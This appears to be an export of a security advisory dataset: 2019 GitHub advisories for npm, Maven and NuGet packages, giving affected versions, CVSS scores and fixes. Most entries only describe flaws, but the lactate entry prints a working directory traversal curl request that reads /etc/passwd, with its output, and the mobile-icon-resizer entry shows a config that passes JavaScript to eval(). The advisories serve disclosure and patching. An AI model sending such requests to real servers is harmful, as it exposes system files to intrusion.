schema_version
stringclasses
1 value
id
stringlengths
19
19
modified
stringlengths
20
20
published
stringlengths
20
20
withdrawn
stringclasses
11 values
aliases
stringlengths
2
20
summary
stringlengths
4
172
details
stringlengths
47
3.95k
severity
stringlengths
2
79
affected
stringlengths
76
3.32k
references
stringlengths
82
11.3k
database_specific
stringlengths
131
190
1.4.0
GHSA-4vr3-9v7h-5f8v
2021-12-03T14:36:23Z
2019-06-18T15:38:41Z
null
[]
Low severity vulnerability that affects Gw2Sharp
## Leaking cached authenticated requests ### Impact If you've been using one `MemoryCacheMethod` object in multiple instances of `Gw2WebApiClient` and are requesting authenticated endpoints with different access tokens, then you are likely to run into this bug. When using an instance of `MemoryCacheMethod` and using it with multiple instances of `Gw2WebApiClient`, there's a possibility that cached authenticated responses are leaking to another request to the same endpoint, but with a different Guild Wars 2 access token. The latter request wouldn't start however, and would return the first cached response immediately. This means that the second response (or later responses) may contain the same data as the first response, therefore leaking data from another authenticated endpoint. The occurence of this is limited however. The Guild Wars 2 API doesn't use the `Expires` header on most (if not all) authenticated endpoints. This header is checked when caching responses. If this header isn't available, the response isn't cached at all. You should still update to at least version 0.3.1 in order to be certain that it won't happen. ### Patches This bug has been fixed in version 0.3.1. When using an authenticated endpoint, it will prepend the SHA-1 hash of the access token to the cache id. ### Workarounds For version 0.3.0 and lower, you can use one separate instance of `MemoryCacheMethod` per `Gw2WebApiClient` if you need to use it. ### For more information If you have any questions or comments about this advisory, you can open an issue in [the Gw2Sharp repository](https://github.com/Archomeda/Gw2Sharp) or contact me on [Discord](https://discord.gg/hNcpDT3).
[]
[{'package': {'ecosystem': 'NuGet', 'name': 'Gw2Sharp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Archomeda/Gw2Sharp/security/advisories/GHSA-4vr3-9v7h-5f8v'}, {'type': 'PACKAGE', 'url': 'https://github.com/Archomeda/Gw2Sharp'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-4vr3-9v7h-5f8v'}]
{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-06-16T20:59:21Z', 'nvd_published_at': None}
1.4.0
GHSA-6fmm-47qc-p4m4
2023-09-07T21:41:55Z
2019-06-13T16:12:26Z
null
['CVE-2019-5438']
Unauthorized File Access in harp
All versions of `harp` are vulnerable to Unauthorized File Access. If a symlink in the project's base directory points to a file outside of the directory, the file is served. This could allow an attacker to access sensitive files on the server. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'harp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.40.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5438'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/530289'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/816'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T16:10:29Z', 'nvd_published_at': None}
1.4.0
GHSA-pm52-wwrw-c282
2021-08-16T14:32:10Z
2019-06-13T18:59:06Z
null
[]
Command Injection in wiki-plugin-datalog
Versions of `wiki-plugin-datalog` prior to 0.1.6 are vulnerable to Command Injection. The package failed to sanitize URLs on the curl endpoint, allowing attackers to inject commands and possibly achieving Remote Code Execution on the system. ## Recommendation Upgrade to version 0.1.6 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'wiki-plugin-datalog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/WardCunningham/wiki-plugin-datalog/commit/020aa6201319e5b76301a61b65268c94dc242fa7'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-WIKIPLUGINDATALOG-449540'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/926'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T18:50:56Z', 'nvd_published_at': None}
1.4.0
GHSA-cj6j-32rg-45r2
2021-08-04T19:54:08Z
2019-06-06T15:29:25Z
null
['CVE-2019-10077']
Cross-site Scripting in JSPWiki
A carefully crafted InterWiki link could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-war'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.11.0.M4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.0.M3'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.11.0.M4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.0.M3'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10077'}, {'type': 'WEB', 'url': 'https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2019-10077'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-05-29T19:05:35Z', 'nvd_published_at': '2019-05-20T21:29:00Z'}
1.4.0
GHSA-mmf6-6597-3v6m
2021-04-12T21:32:14Z
2019-06-13T20:18:28Z
null
['CVE-2019-11269']
Open Redirect in Spring Security OAuth
Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the redirect_uri parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security.oauth:spring-security-oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.18'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security.oauth:spring-security-oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security.oauth:spring-security-oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security.oauth:spring-security-oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11269'}, {'type': 'WEB', 'url': 'https://pivotal.io/security/cve-2019-11269'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/153299/Spring-Security-OAuth-2.3-Open-Redirection.html'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T20:17:53Z', 'nvd_published_at': '2019-06-12T15:29:00Z'}
1.4.0
GHSA-68hw-vfh7-xvg8
2021-08-16T15:25:07Z
2019-06-13T20:38:09Z
null
['CVE-2019-10157']
Forced Logout in keycloak-connect
Versions of `keycloak-connect` prior to 4.4.0 are vulnerable to Forced Logout. The package fails to validate JWT signatures on the `/k_logout` route, allowing attackers to logout users and craft malicious JWTs with NBF values that prevent user access indefinitely. ## Recommendation Upgrade to version 4.4.0 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'keycloak-connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.8.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10157'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak-nodejs-connect/commit/55e54b55d05ba636bc125a8f3d39f0052d13f8f6'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10157'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KEYCLOAKNODEJSCONNECT-449920'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/978'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/108734'}]
{'cwe_ids': ['CWE-287', 'CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T20:28:41Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}
1.4.0
GHSA-mxjr-xmcg-fg7w
2021-08-17T15:41:58Z
2019-06-27T17:25:21Z
null
[]
Arbitrary Code Injection in mobile-icon-resizer
mobile-icon-resizer resizes large images for use as icons for iOS and Android. mobile-icon-resizer has a code execution vulnerability in versions before 0.4.3. mobile-icon-resizer takes an options object as an argument to define the resulting icons as such: ``` var options = { config: './config.js' } resize(options, function(err){}); ``` config.js would need to be a file on the filesystem and look something like: ``` var config = { iOS: { "images": [ /* iOS image definitions are not vulnerable */ ] }, android: { "images" : [ { "baseRatio" : "console.log('Executing script as baseRatio property')", "folder" : "drawable-ldpi" }, { "ratio" : "console.log('Executing script as ratio property')", "folder" : "drawable-mdpi" }, /* other android image defintiions ... */ ] } }; exports = module.exports = config; ``` The parameters `ratio` and `baseRatio` are passed directly to `eval()`, thus allowing dynamic javascript payloads to be executed. ## Recommendation Update to version 0.4.3 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'mobile-icon-resizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.4.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/muzzley/mobile-icon-resizer/issues/8'}, {'type': 'WEB', 'url': 'https://github.com/muzzley/mobile-icon-resizer/commit/a6c50f884bd282d74ab77e1fce6317d5d0dd2f0f'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:mobile-icon-resizer:20160408'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/317'}]
{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-27T15:58:50Z', 'nvd_published_at': None}
1.4.0
GHSA-3xc7-xg67-pw99
2021-08-04T20:54:45Z
2019-06-05T20:43:10Z
null
[]
Sensitive Data Exposure in sequelize-cli
Versions of `sequelize-cli` prior to 5.5.0 are vulnerable to Sensitive Data Exposure. The function `filteredURL()` does not properly sanitize the `config.password` value which may cause passwords with special characters to be logged in plain text. ## Recommendation Upgrade to version 5.5.0 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'sequelize-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.4.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/sequelize/cli/issues/172'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/cli/pull/722'}, {'type': 'WEB', 'url': 'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SEQUELIZECLI-174320'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/825'}]
{'cwe_ids': ['CWE-532'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T20:42:54Z', 'nvd_published_at': None}
1.4.0
GHSA-h9x2-5rm7-x4gm
2020-08-31T18:09:18Z
2019-06-03T17:28:23Z
null
['CVE-2015-9238']
Insecure Comparison in secure-compare
Versions of `secure-compare` prior to 3.0.1 are affected by a vulnerability that results in the package always returning true when comparing two strings of the same length, despite differences in the contents of those strings. ## Recommendation Upgrade to version 3.0.1 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'secure-compare'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-9238'}, {'type': 'WEB', 'url': 'https://github.com/vdemedes/secure-compare/pull/1'}, {'type': 'WEB', 'url': 'https://github.com/vadimdemedes/secure-compare/commit/dd1ff1ac0122de7e0af4f00c61ed73261062394a'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/50'}]
{'cwe_ids': ['CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-03T17:22:37Z', 'nvd_published_at': None}
1.4.0
GHSA-68gr-cmcp-g3mj
2021-08-16T23:34:10Z
2019-06-14T16:39:31Z
null
[]
Directory Traversal in lactate
A crafted `GET` request can be leveraged to traverse the directory structure of a host using the lactate web server package, and request arbitrary files outside of the specified web root. This allows for a remote attacker to gain access to arbitrary files on the filesystem that the process has access to read. Mitigating factors: Only files that the user running `lactate` has permission to read will be accessible via this vulnerability. [Proof of concept](https://hackerone.com/reports/296645): Please globally install the `lactate` package and `cd` to a directory you wish to serve assets from. Next, run `lactate -p 8081` to start serving files from this location. The following cURL request can be used to demonstrate this vulnerability by requesting the target `/etc/passwd` file: ``` curl "http://127.0.0.1:8081/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" ``` ``` root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin [...] ``` ## Recommendation As there is currently no fix for this issue selecting an alternative static web server would be the best choice.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'lactate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.13.12'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/RetireJS/retire.js/commit/800c8140884eaa5753a49308f560c925fe97b9a5'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/296645'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:lactate:20180123'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/560'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-14T16:39:14Z', 'nvd_published_at': None}
1.4.0
GHSA-52mh-p2m2-w625
2021-08-04T21:01:39Z
2019-06-07T20:56:59Z
null
['CVE-2019-12741']
Cross-site Scripting in HAPI FHIR
XSS exists in the HAPI FHIR testpage overlay module of the HAPI FHIR library before 3.8.0. The attack involves unsanitized HTTP parameters being output in a form page, allowing attackers to leak cookies and other sensitive information from ca/uhn/fhir/to/BaseController.java via a specially crafted URL. (This module is not generally used in production systems so the attack surface is expected to be low, but affected systems are recommended to upgrade immediately.)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'ca.uhn.hapi.fhir:hapi-fhir-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12741'}, {'type': 'WEB', 'url': 'https://github.com/jamesagnew/hapi-fhir/issues/1335'}, {'type': 'WEB', 'url': 'https://github.com/jamesagnew/hapi-fhir/commit/8f41159eb147eeb964cad68b28eff97acac6ea9a'}, {'type': 'WEB', 'url': 'https://github.com/jamesagnew/hapi-fhir/releases/tag/v3.8.0'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-07T14:35:54Z', 'nvd_published_at': '2019-06-05T15:29:00Z'}
1.4.0
GHSA-74cr-77xc-8g6r
2021-08-16T15:28:22Z
2019-06-13T20:37:39Z
null
[]
Prototype Pollution in @apollo/gateway
Versions of `@apollo/gateway` prior to 0.6.2 are vulnerable to Prototype Pollution. The package uses deepMerge() to merge objects, which may allow attackers to alter the Object prototype through queries with GraphQL aliases. Carefully constructed payloads can override properties of all objects in the application. This may lead to Denial of Service or may be chained with other vulnerabilities leading to Remote Code Execution. ## Recommendation Upgrade to version 0.6.2 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': '@apollo/gateway'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/pull/2779'}, {'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/commit/cea7397582a293af6a5f60947da34b95e669c6c1'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-APOLLOGATEWAY-174915'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/917'}]
{'cwe_ids': ['CWE-1321', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T20:37:08Z', 'nvd_published_at': None}
1.4.0
GHSA-984p-xq9m-4rjw
2021-08-04T21:03:16Z
2019-06-07T21:01:53Z
null
[]
Rate Limiting Bypass in express-brute
All versions of `express-brute` are vulnerable to Rate Limiting Bypass. Concurrent requests may lead to race conditions that cause the package to incorrectly count requests. This may allow an attacker to bypass the rate limiting provided by the package and execute requests without limiting. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'express-brute'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/AdamPflug/express-brute/issues/46'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-EXPRESSBRUTE-174457'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/823'}]
{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-07T21:01:37Z', 'nvd_published_at': None}
1.4.0
GHSA-gc94-6w89-hpqr
2021-09-16T20:59:56Z
2019-06-12T16:37:07Z
null
[]
Command Injection in fs-path
All versions of `fs-path` are vulnerable to command injection is unsanitized user input is passed in. ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
[]
[{'package': {'ecosystem': 'npm', 'name': 'fs-path'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.25'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pillys/fs-path/pull/5'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/324491'}, {'type': 'PACKAGE', 'url': 'https://github.com/pillys/fs-path'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/661'}]
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-12T16:34:26Z', 'nvd_published_at': None}
1.4.0
GHSA-3fc5-9x9m-vqc4
2021-08-04T21:25:59Z
2019-06-03T17:31:32Z
null
[]
Privilege Escalation in express-cart
Versions of `express-cart` before 1.1.6 are vulnerable to privilege escalation. This vulnerability can be exploited so that normal users can escalate their privilege and add new administrator users. ## Recommendation Update to version 1.1.6 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'express-cart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/mrvautin/expressCart/commit/baccaae9b0b72f00b10c5453ca00231340ad3e3b'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/343626'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/469.json'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:express-cart:20180712'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/730'}]
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-03T17:30:55Z', 'nvd_published_at': None}
1.4.0
GHSA-28xh-wpgr-7fm8
2020-08-31T18:31:51Z
2019-06-20T15:35:49Z
null
[]
Command Injection in open
Versions of `open` before 6.0.0 are vulnerable to command injection when unsanitized user input is passed in. The package does come with the following warning in the readme: ``` The same care should be taken when calling open as if you were calling child_process.exec directly. If it is an executable it will run in a new shell. ``` ## Recommendation `open` is now the deprecated `opn` package. Upgrading to the latest version is likely have unwanted effects since it now has a very different API but will prevent this vulnerability.
[]
[{'package': {'ecosystem': 'npm', 'name': 'open'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pwnall/node-open/issues/68'}, {'type': 'WEB', 'url': 'https://github.com/pwnall/node-open/issues/69'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/319473'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/663'}]
{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T15:35:06Z', 'nvd_published_at': None}
1.4.0
GHSA-f698-m2v9-5fh3
2020-08-31T18:35:50Z
2019-06-04T20:11:44Z
null
[]
Command Injection in opencv
Versions of `opencv`prior to 6.1.0 are vulnerable to Command Injection. The utils/ script find-opencv.js does not validate user input allowing attackers to execute arbitrary commands. ## Recommendation Upgrade to version 6.1.0.
[]
[{'package': {'ecosystem': 'npm', 'name': 'opencv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b#diff-dab2f6d17b2fd005a9425e97172dc8cb'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/789'}]
{'cwe_ids': ['CWE-77'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T20:11:26Z', 'nvd_published_at': None}
1.4.0
GHSA-f7qw-5pvg-mmwp
2021-08-16T14:36:47Z
2019-06-13T18:58:44Z
null
[]
Prototype Pollution in lutils-merge
All versions of `lutils-merge` are vulnerable to Prototype Pollution. The merge() function fails to prevent user input to alter an Object's prototype, allowing attackers to modify override properties of all objects in the application. This may lead to Denial of Service or may be chained with other vulnerabilities leading to Remote Code Execution. ## Recommendation The package is deprecated and no fixes are available. Consider using an alternative package.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'lutils-merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/nfour/lutils-merge/issues/1'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/439107'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LUTILSMERGE-174783'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/893'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T18:58:27Z', 'nvd_published_at': None}
1.4.0
GHSA-q42p-pg8m-cqh6
2021-08-04T20:54:05Z
2019-06-05T14:07:48Z
null
[]
Prototype Pollution in handlebars
Versions of `handlebars` prior to 4.0.14 are vulnerable to Prototype Pollution. Templates may alter an Objects' prototype, thus allowing an attacker to execute arbitrary code on the server. ## Recommendation For handlebars 4.1.x upgrade to 4.1.2 or later. For handlebars 4.0.x upgrade to 4.0.14 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ecosystem_specific': {'affected_functions': ['handlebars.helpers.lookup']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ecosystem_specific': {'affected_functions': ['handlebars.helpers.lookup']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.14'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ecosystem_specific': {'affected_functions': ['handlebars.helpers.lookup']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.7'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/handlebars-lang/handlebars.js/issues/1495'}, {'type': 'WEB', 'url': 'https://github.com/handlebars-lang/handlebars.js/commit/0d6d8c335ad81bad1b672fc56b6a44f6aa472dac'}, {'type': 'WEB', 'url': 'https://github.com/handlebars-lang/handlebars.js/commit/7372d4e9dffc9d70c09671aa28b9392a1577fd86'}, {'type': 'WEB', 'url': 'https://github.com/handlebars-lang/handlebars.js/commit/85c8783b34fc6d36145d8b53885ad0b9e3c3f9c4'}, {'type': 'WEB', 'url': 'https://github.com/handlebars-lang/handlebars.js/commit/cd38583216dce3252831916323202749431c773e'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HANDLEBARS-173692'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/755'}]
{'cwe_ids': ['CWE-471'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T13:55:39Z', 'nvd_published_at': None}
1.4.0
GHSA-8w57-jfpm-945m
2023-04-11T00:26:58Z
2019-06-11T16:16:07Z
null
[]
Denial of Service in http-proxy-agent
Versions of `http-proxy-agent` before 2.1.0 are vulnerable to denial of service and uninitialized memory leak when unsanitized options are passed to `Buffer`. An attacker may leverage these unsanitized options to consume system resources. ## Recommendation Update to version 2.1.0 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'http-proxy-agent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://hackerone.com/reports/321631'}, {'type': 'WEB', 'url': 'https://github.com/TooTallNate/node-http-proxy-agent/blob/2.0.0/index.js#L80'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/607'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-11T16:11:38Z', 'nvd_published_at': None}
1.4.0
GHSA-28hp-fgcr-2r4h
2021-02-24T18:32:36Z
2019-06-27T17:25:42Z
null
[]
Cross-Site Scripting via JSONP
JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors.
[]
[{'package': {'ecosystem': 'npm', 'name': 'angular'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1630'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-27T15:51:47Z', 'nvd_published_at': None}
1.4.0
GHSA-74cp-qw7f-7hpw
2020-08-31T18:36:24Z
2019-06-05T14:10:23Z
null
[]
Path Traversal in statics-server
All versions of `statics-server` are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
[]
[{'package': {'ecosystem': 'npm', 'name': 'statics-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.9'}]}]}]
